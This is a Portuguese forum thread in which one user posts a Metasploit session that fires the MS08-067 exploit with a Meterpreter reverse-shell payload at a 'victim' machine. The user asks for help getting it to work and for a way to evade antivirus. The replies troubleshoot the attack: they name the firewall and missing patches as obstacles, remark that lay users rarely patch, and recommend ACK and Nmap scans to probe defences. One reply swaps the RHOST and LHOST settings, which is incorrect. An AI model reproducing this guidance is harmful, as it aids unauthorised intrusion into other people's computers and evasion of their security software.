Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Metasploit - Penetration

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Duvida Metasploit - Penetration

    Por favor pessoal me ajudem ai , preciso muito já estou um tempo com está dúvida e até agora não consegui descobrir o que, será que alguém poderia me dizer o que eu estou fazendo de errado o que está faltando sei-la.

    A seguir o que está acontecendo:

    ---------------------------------------------------------------------------------------------------------------------------

    msf > use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(ms08_067_netapi) > set rhost ***.***.***.***
    rhost => ***.***.***.***
    msf exploit(ms08_067_netapi) > set lhost ***.***.***.***
    lhost => ***.***.***.***
    msf exploit(ms08_067_netapi) > exploit

    [*] Started reverse handler on ***.***.***.***:4444
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP - Service Pack 2 - lang:Portuguese - Brazilian
    [*] Selected Target: Windows XP SP2 Portuguese - Brazilian (NX)
    [*] Attempting to trigger the vulnerability...


    ---------------------------------------------------------------------------------------------------------------------------


    Eu sei que existe outros tipos de ataques, eu gostaria de saber se alguém pode me ajudar.
    E qual o comando que eu posso criar meu exploit. E que não fique sendo detectado pelos anti vírus. Ja pesquisei mais não encontrei.
    Por favor me ajude!!! Ficaria muito Grato valeu!

  • Font Size
    #2
    tbm tou com a mesma duvida, mais tipo o computador com o BT ele não reconheceu o pc da vítima na rede.
    já o pc q eu botei como vítima reconheceu o BT.

    Comment


    • Font Size
      #3
      bom quando a execução da exploração para no meio como vc copiou, quer dizer que o exploit esta certo mais alguma coisa setada ta errada, no seu caso de uma olhada no payload e reveja tudo novamente.. se no final aparecesse sessão não foi criada, no caso o exploit q estaria sendo usado estaria errado..

      att
      ĿэtђØяn

      Comment


      • Font Size
        #4
        Amigo, seguinte:

        O ms08_067_netapi, só vai funionar nos casos:

        Firewall desativado
        A vítima não ter baixado o patch de correção da falha


        Então eu acho que ai no seu caso, só pode ser o Firewall, pois usuários leigos, nem sabem a existência desta vulnerabilidade, e nem vão atrás de patch. Agora, o Firewalll, geralmente já vem ativado junto com o Windows, dai com o Firewall ativado, infelizmente você pode esquecer. Mas para saber mais, procure algo sobre ACK Scan. Essa varredura, tenta descobrir regras de filtragem de Firewalls, assim, você já pode ter uma noção se a vítima utiliza ou não Firewall!

        Outra:
        Você tem certeza de estar setando o RHOST com seu IP INTERNO, e o LHOST com o IP INTERNO da vítima?
        \m/

        Comment


        • Font Size
          #5
          cara eu usso o BT5 ai para descobri as portas livres dos computadores eu usso o NMAP, mais em alguns pcs ele não conseque descobri, principalmente quando o windows ta com o Firewall ativado. queria saber o q ta errado.

          Comment

          X
          Working...
          X